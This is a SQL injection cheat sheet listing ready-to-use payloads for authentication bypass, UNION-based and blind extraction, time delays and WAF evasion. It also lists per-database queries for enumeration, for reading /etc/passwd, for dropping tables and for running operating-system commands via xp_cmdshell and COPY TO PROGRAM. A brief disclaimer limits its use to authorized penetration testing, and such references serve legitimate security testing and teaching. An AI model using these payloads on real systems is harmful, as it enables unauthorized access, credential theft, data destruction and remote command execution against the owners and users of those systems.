SQL Injection Cheat Sheet

🧠 Basic SQL Injection

' OR '1'='1
' OR 1=1 --
" OR 1=1 --
' OR 'a'='a
') OR ('1'='1

🔍 Authentication Bypass

' OR '1'='1' --
' OR '1'='1' /*
' OR 1=1#
admin' --

📚 UNION-Based SQL Injection

Find column count:

' ORDER BY 1--
' ORDER BY 2--

Using UNION:

' UNION SELECT null, null --
' UNION SELECT 1,2,3 --
' UNION SELECT username, password FROM users --

🖥️ Error-Based SQL Injection

' AND 1=CONVERT(int, (SELECT @@version)) --
' AND 1=CAST((SELECT user()) AS int) --

🧪 Blind SQL Injection

' AND 1=1 -- (True)
' AND 1=2 -- (False)
' AND substring(@@version,1,1)='5' --
' AND ASCII(SUBSTRING((SELECT database()),1,1))=100 --

⏱️ Time-Based Blind SQL Injection

' OR IF(1=1, SLEEP(5), 0) -- (MySQL)
'; IF (1=1) WAITFOR DELAY '0:0:5'-- (MSSQL)

🛡️ WAF Bypass & Obfuscation

%27 OR %271%27=%271 (URL encoded)
'/**/OR/**/'1'='1
' OR 1=1-- -
')/**/OR/**/(1=1)--
UN/**/ION SEL/**/ECT

📂 Extracting Data

' UNION SELECT table_name, null FROM information_schema.tables --
' UNION SELECT column_name, null FROM information_schema.columns WHERE table_name='users' --
' UNION SELECT username, password FROM users --

🔍 Useful Functions (MySQL)

database()
version()
user()
@@datadir
LOAD_FILE('/etc/passwd')
INFORMATION_SCHEMA.TABLES

🔒 MySQL Comments & Tricks

-- (Comment)
# (Comment)
/* comment */
' /*!UNION*/ SELECT

🧬 Stack Queries (MSSQL)

'; DROP TABLE users --
'; EXEC xp_cmdshell('whoami') --

🔐 Bypass Filters

'OR'1'='1
'||(SELECT 1)=1
' AND CHAR(124)+CHAR(124)+(SELECT 1)=1

🛑 Disclaimer

This cheat sheet is intended for educational purposes, penetration testing in authorized environments, and improving application security. Do not use these techniques on systems without explicit permission.

💉 SQL Injection Cheat Sheet by DBMS

Note: Syntax may vary depending on the database. Always tailor payloads to the specific backend.

🛢️ MySQL

Version: SELECT @@version;
Current User: SELECT user();
Current DB: SELECT database();
List DBs: SELECT schema_name FROM information_schema.schemata;
List Tables: SELECT table_name FROM information_schema.tables WHERE table_schema='target_db';
List Columns: SELECT column_name FROM information_schema.columns WHERE table_name='target_table';
Read File: SELECT LOAD_FILE('/etc/passwd');
Time Delay: SLEEP(5)
Comment Syntax: -- | # | /* */

🐘 PostgreSQL

Version: SELECT version();
Current User: SELECT current_user;
Current DB: SELECT current_database();
List Tables: SELECT table_name FROM information_schema.tables WHERE table_schema='public';
List Columns: SELECT column_name FROM information_schema.columns WHERE table_name='target_table';
Time Delay: pg_sleep(5);
Command Execution (with permissions): COPY (SELECT '') TO PROGRAM 'id';
Comment Syntax: --

🦾 Microsoft SQL Server

Version: SELECT @@version;
Current User: SELECT SYSTEM_USER;
Current DB: SELECT DB_NAME();
List DBs: SELECT name FROM master..sysdatabases;
List Tables: SELECT name FROM sysobjects WHERE xtype='U';
Command Execution: EXEC xp_cmdshell 'whoami';
Time Delay: WAITFOR DELAY '0:0:5';
Comment Syntax: -- | /* */

🔶 Oracle

Version: SELECT * FROM v$version;
Current User: SELECT user FROM dual;
Current DB: SELECT ora_database_name FROM dual;
List Tables: SELECT table_name FROM all_tables;
List Columns: SELECT column_name FROM all_tab_columns WHERE table_name='TARGET_TABLE';
Time Delay: DBMS_LOCK.SLEEP(5);
Command Execution: Java procedures or external tables (if configured)
Comment Syntax: -- | /* */